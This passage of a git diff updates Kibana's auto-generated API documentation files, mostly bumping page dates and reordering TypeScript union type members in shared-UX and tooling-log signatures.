@@ -200,13 +200,13 @@ "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", 
@@ -218,15 +218,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", 
@@ -236,15 +236,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", 
@@ -256,15 +256,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -276,7 +276,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", 
@@ -284,7 +284,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -294,7 +294,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -302,7 +302,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -314,7 +314,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", 
@@ -322,13 +322,13 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", " & ", "DisambiguateSet", - "<{ tooltipContent: React.ReactNode; title?: string | undefined; }, { title: string; tooltipContent?: React.ReactNode; }> & { title: string; tooltipContent?: React.ReactNode; } & { label: React.ReactNode; })> | undefined; selectable?: ", + "<{ tooltipContent: React.ReactNode; title?: string | undefined; }, { title: string; tooltipContent?: React.ReactNode; }> & { title: string; tooltipContent?: React.ReactNode; } & { label: React.ReactNode; })> | undefined; display?: \"warning\" | \"subdued\" | \"primary\" | \"accent\" | \"success\" | \"danger\" | \"transparent\" | \"plain\" | undefined; selectable?: ", "EuiCardSelectProps", " | undefined; }" ], diff --git a/api_docs/kbn_shared_ux_card_no_data.mdx b/api_docs/kbn_shared_ux_card_no_data.mdx index 3e3ecfcd17e42..c8fc4d7c49bcc 100644 --- a/api_docs/kbn_shared_ux_card_no_data.mdx +++ b/api_docs/kbn_shared_ux_card_no_data.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-card-no-data title: "@kbn/shared-ux-card-no-data" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-card-no-data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-card-no-data'] --- import kbnSharedUxCardNoDataObj from './kbn_shared_ux_card_no_data.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json b/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json index c3f38d680e208..9e15f43a46545 100644 --- a/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json 
+++ b/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json @@ -470,7 +470,7 @@ "\nStorybook parameters provided from the controls addon." ], "signature": [ - "{ title: any; button: any; description: any; category: any; canAccessFleet: any; }" + "{ title: any; description: any; category: any; button: any; canAccessFleet: any; }" ], "path": "packages/shared-ux/card/no_data/mocks/src/storybook.ts", "deprecated": false, diff --git a/api_docs/kbn_shared_ux_card_no_data_mocks.mdx b/api_docs/kbn_shared_ux_card_no_data_mocks.mdx index c1de9ac63a78c..166a358c79f5f 100644 --- a/api_docs/kbn_shared_ux_card_no_data_mocks.mdx +++ b/api_docs/kbn_shared_ux_card_no_data_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-card-no-data-mocks title: "@kbn/shared-ux-card-no-data-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-card-no-data-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-card-no-data-mocks'] --- import kbnSharedUxCardNoDataMocksObj from './kbn_shared_ux_card_no_data_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_components.devdocs.json b/api_docs/kbn_shared_ux_components.devdocs.json index 48342694fc62e..52bb9bcd5d8b0 100644 --- a/api_docs/kbn_shared_ux_components.devdocs.json +++ b/api_docs/kbn_shared_ux_components.devdocs.json @@ -221,7 +221,7 @@ "signature": [ "Omit<", "EuiPageProps", - ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"s\" | \"m\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", + ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"m\" | \"s\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", "EuiPageSideBarProps", " | undefined; pageHeader?: ", "EuiPageHeaderProps", 
diff --git a/api_docs/kbn_shared_ux_components.mdx b/api_docs/kbn_shared_ux_components.mdx index faa7e58949c5c..b98c4847a61f9 100644 --- a/api_docs/kbn_shared_ux_components.mdx +++ b/api_docs/kbn_shared_ux_components.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-components title: "@kbn/shared-ux-components" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-components plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-components'] --- import kbnSharedUxComponentsObj from './kbn_shared_ux_components.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx b/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx index 58460783d5ceb..9a97cb66c3dfd 100644 --- a/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx +++ b/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-link-redirect-app-mocks title: "@kbn/shared-ux-link-redirect-app-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-link-redirect-app-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-link-redirect-app-mocks'] --- import kbnSharedUxLinkRedirectAppMocksObj from './kbn_shared_ux_link_redirect_app_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_analytics_no_data.mdx b/api_docs/kbn_shared_ux_page_analytics_no_data.mdx index 9ade00f1687bc..760cecf99f62f 100644 --- a/api_docs/kbn_shared_ux_page_analytics_no_data.mdx +++ b/api_docs/kbn_shared_ux_page_analytics_no_data.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-analytics-no-data title: "@kbn/shared-ux-page-analytics-no-data" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-analytics-no-data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-analytics-no-data'] --- import kbnSharedUxPageAnalyticsNoDataObj from './kbn_shared_ux_page_analytics_no_data.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx b/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx index 79a5cf701f612..9afae8214cfcb 100644 --- a/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx +++ b/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-analytics-no-data-mocks title: "@kbn/shared-ux-page-analytics-no-data-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-analytics-no-data-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-analytics-no-data-mocks'] --- import kbnSharedUxPageAnalyticsNoDataMocksObj from './kbn_shared_ux_page_analytics_no_data_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_kibana_no_data.mdx b/api_docs/kbn_shared_ux_page_kibana_no_data.mdx index 322be802d6c08..1a3a3c7c89877 100644 --- a/api_docs/kbn_shared_ux_page_kibana_no_data.mdx +++ b/api_docs/kbn_shared_ux_page_kibana_no_data.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-kibana-no-data title: "@kbn/shared-ux-page-kibana-no-data" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-kibana-no-data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-kibana-no-data'] --- import kbnSharedUxPageKibanaNoDataObj from './kbn_shared_ux_page_kibana_no_data.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx b/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx index a512afe961836..c316e7b9d753b 100644 --- a/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx +++ b/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-kibana-no-data-mocks title: "@kbn/shared-ux-page-kibana-no-data-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-kibana-no-data-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-kibana-no-data-mocks'] --- import kbnSharedUxPageKibanaNoDataMocksObj from './kbn_shared_ux_page_kibana_no_data_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_solution_nav.mdx b/api_docs/kbn_shared_ux_page_solution_nav.mdx index 556c689971b16..41361fcc40286 100644 --- a/api_docs/kbn_shared_ux_page_solution_nav.mdx +++ b/api_docs/kbn_shared_ux_page_solution_nav.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-solution-nav title: "@kbn/shared-ux-page-solution-nav" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-solution-nav plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-solution-nav'] --- import kbnSharedUxPageSolutionNavObj from './kbn_shared_ux_page_solution_nav.devdocs.json'; 
diff --git a/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json b/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json index 95f98f1e1bdb8..2a8c4dc5623ba 100644 --- a/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json +++ b/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json @@ -229,7 +229,7 @@ "The background color of the prompt; defaults to `plain`." ], "signature": [ - "\"primary\" | \"success\" | \"accent\" | \"warning\" | \"danger\" | \"subdued\" | \"transparent\" | \"plain\" | undefined" + "\"warning\" | \"subdued\" | \"primary\" | \"accent\" | \"success\" | \"danger\" | \"transparent\" | \"plain\" | undefined" ], "path": "node_modules/@kbn/shared-ux-prompt-no-data-views-types/index.d.ts", "deprecated": false diff --git a/api_docs/kbn_shared_ux_prompt_no_data_views.mdx b/api_docs/kbn_shared_ux_prompt_no_data_views.mdx index c3d677ceca3b8..c808c5622a8ed 100644 --- a/api_docs/kbn_shared_ux_prompt_no_data_views.mdx +++ b/api_docs/kbn_shared_ux_prompt_no_data_views.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-prompt-no-data-views title: "@kbn/shared-ux-prompt-no-data-views" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-prompt-no-data-views plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-prompt-no-data-views'] --- import kbnSharedUxPromptNoDataViewsObj from './kbn_shared_ux_prompt_no_data_views.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx b/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx index ede900e41da16..7d07e9de1ed81 100644 --- a/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx +++ b/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-prompt-no-data-views-mocks title: "@kbn/shared-ux-prompt-no-data-views-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-prompt-no-data-views-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-prompt-no-data-views-mocks'] --- import kbnSharedUxPromptNoDataViewsMocksObj from './kbn_shared_ux_prompt_no_data_views_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_services.mdx b/api_docs/kbn_shared_ux_services.mdx index b230b11db2a3f..2a20804cdf191 100644 --- a/api_docs/kbn_shared_ux_services.mdx +++ b/api_docs/kbn_shared_ux_services.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-services title: "@kbn/shared-ux-services" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-services plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-services'] --- import kbnSharedUxServicesObj from './kbn_shared_ux_services.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_storybook.mdx b/api_docs/kbn_shared_ux_storybook.mdx index 14a7f2b94f319..87f77aff15cd6 100644 --- a/api_docs/kbn_shared_ux_storybook.mdx +++ b/api_docs/kbn_shared_ux_storybook.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-storybook title: "@kbn/shared-ux-storybook" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-storybook plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-storybook'] --- import kbnSharedUxStorybookObj from './kbn_shared_ux_storybook.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_storybook_mock.mdx b/api_docs/kbn_shared_ux_storybook_mock.mdx index 1e6a8f1caa76f..c52de3158ef53 100644 --- a/api_docs/kbn_shared_ux_storybook_mock.mdx +++ b/api_docs/kbn_shared_ux_storybook_mock.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-storybook-mock title: "@kbn/shared-ux-storybook-mock" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-storybook-mock plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-storybook-mock'] --- import kbnSharedUxStorybookMockObj from './kbn_shared_ux_storybook_mock.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_utility.mdx b/api_docs/kbn_shared_ux_utility.mdx index d6685ef3673d3..eb6d461c74a9e 100644 --- a/api_docs/kbn_shared_ux_utility.mdx +++ b/api_docs/kbn_shared_ux_utility.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-utility title: "@kbn/shared-ux-utility" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-utility plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-utility'] --- import kbnSharedUxUtilityObj from './kbn_shared_ux_utility.devdocs.json'; diff --git a/api_docs/kbn_some_dev_log.mdx b/api_docs/kbn_some_dev_log.mdx index 6e5d0f7977e6d..fb074811f062d 100644 --- a/api_docs/kbn_some_dev_log.mdx +++ b/api_docs/kbn_some_dev_log.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-some-dev-log title: "@kbn/some-dev-log" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/some-dev-log plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/some-dev-log'] --- import kbnSomeDevLogObj from './kbn_some_dev_log.devdocs.json'; diff --git a/api_docs/kbn_sort_package_json.mdx b/api_docs/kbn_sort_package_json.mdx index 82d54ae5eadd2..274025b5e3e3d 100644 --- a/api_docs/kbn_sort_package_json.mdx +++ b/api_docs/kbn_sort_package_json.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-sort-package-json title: "@kbn/sort-package-json" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/sort-package-json plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/sort-package-json'] --- import kbnSortPackageJsonObj from './kbn_sort_package_json.devdocs.json'; diff --git a/api_docs/kbn_std.mdx b/api_docs/kbn_std.mdx index d5a8163579ff7..5b1a4e4e890ad 100644 --- a/api_docs/kbn_std.mdx +++ b/api_docs/kbn_std.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-std title: "@kbn/std" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/std plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/std'] --- import kbnStdObj from './kbn_std.devdocs.json'; diff --git a/api_docs/kbn_stdio_dev_helpers.mdx b/api_docs/kbn_stdio_dev_helpers.mdx index a5f2611815a14..382c256e5e024 100644 --- a/api_docs/kbn_stdio_dev_helpers.mdx +++ b/api_docs/kbn_stdio_dev_helpers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-stdio-dev-helpers title: "@kbn/stdio-dev-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/stdio-dev-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/stdio-dev-helpers'] --- import kbnStdioDevHelpersObj from './kbn_stdio_dev_helpers.devdocs.json'; diff --git a/api_docs/kbn_storybook.mdx b/api_docs/kbn_storybook.mdx index fda6332743a40..3f65c4d851ae2 100644 --- a/api_docs/kbn_storybook.mdx +++ b/api_docs/kbn_storybook.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-storybook title: "@kbn/storybook" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/storybook plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/storybook'] --- import kbnStorybookObj from './kbn_storybook.devdocs.json'; diff --git a/api_docs/kbn_telemetry_tools.mdx b/api_docs/kbn_telemetry_tools.mdx index 5d3d664479058..ef83560e77c81 100644 --- a/api_docs/kbn_telemetry_tools.mdx +++ b/api_docs/kbn_telemetry_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-telemetry-tools title: "@kbn/telemetry-tools" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/telemetry-tools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/telemetry-tools'] --- import kbnTelemetryToolsObj from './kbn_telemetry_tools.devdocs.json'; diff --git a/api_docs/kbn_test.mdx b/api_docs/kbn_test.mdx index 9d76da705e6e3..5ef8c29d8affa 100644 --- a/api_docs/kbn_test.mdx +++ b/api_docs/kbn_test.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-test title: "@kbn/test" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/test plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/test'] --- import kbnTestObj from './kbn_test.devdocs.json'; diff --git a/api_docs/kbn_test_jest_helpers.mdx b/api_docs/kbn_test_jest_helpers.mdx index 966d93e31a543..884bb77c0580b 100644 --- a/api_docs/kbn_test_jest_helpers.mdx +++ b/api_docs/kbn_test_jest_helpers.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-test-jest-helpers title: "@kbn/test-jest-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/test-jest-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/test-jest-helpers'] --- import kbnTestJestHelpersObj from './kbn_test_jest_helpers.devdocs.json'; diff --git a/api_docs/kbn_tooling_log.devdocs.json b/api_docs/kbn_tooling_log.devdocs.json index 3ead6f8896f56..063dd3e389106 100644 --- a/api_docs/kbn_tooling_log.devdocs.json +++ b/api_docs/kbn_tooling_log.devdocs.json @@ -558,7 +558,7 @@ "label": "level", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/tooling_log_collecting_writer.ts", "deprecated": false, @@ -651,7 +651,7 @@ "label": "level", "description": [], "signature": [ - "{ name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; success: boolean; warning: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" + "{ name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; warning: boolean; success: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" ], "path": "packages/kbn-tooling-log/src/tooling_log_text_writer.ts", "deprecated": false 
@@ -865,7 +865,7 @@ "label": "parseLogLevel", "description": [], "signature": [ - "(name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\") => { name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; success: boolean; warning: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" + "(name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\") => { name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; warning: boolean; success: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, @@ -878,7 +878,7 @@ "label": "name", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, @@ -896,7 +896,7 @@ "label": "pickLevelFromFlags", "description": [], "signature": [ - "(flags: Record, options: { default?: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; }) => \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "(flags: Record, options: { default?: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; }) => \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, 
@@ -933,7 +933,7 @@ "label": "default", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false @@ -968,7 +968,7 @@ "level/type of message" ], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"write\" | \"info\" | \"debug\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"write\" | \"info\" | \"debug\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/message.ts", "deprecated": false @@ -1088,7 +1088,7 @@ "\nLog level, messages below this level will be ignored" ], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": 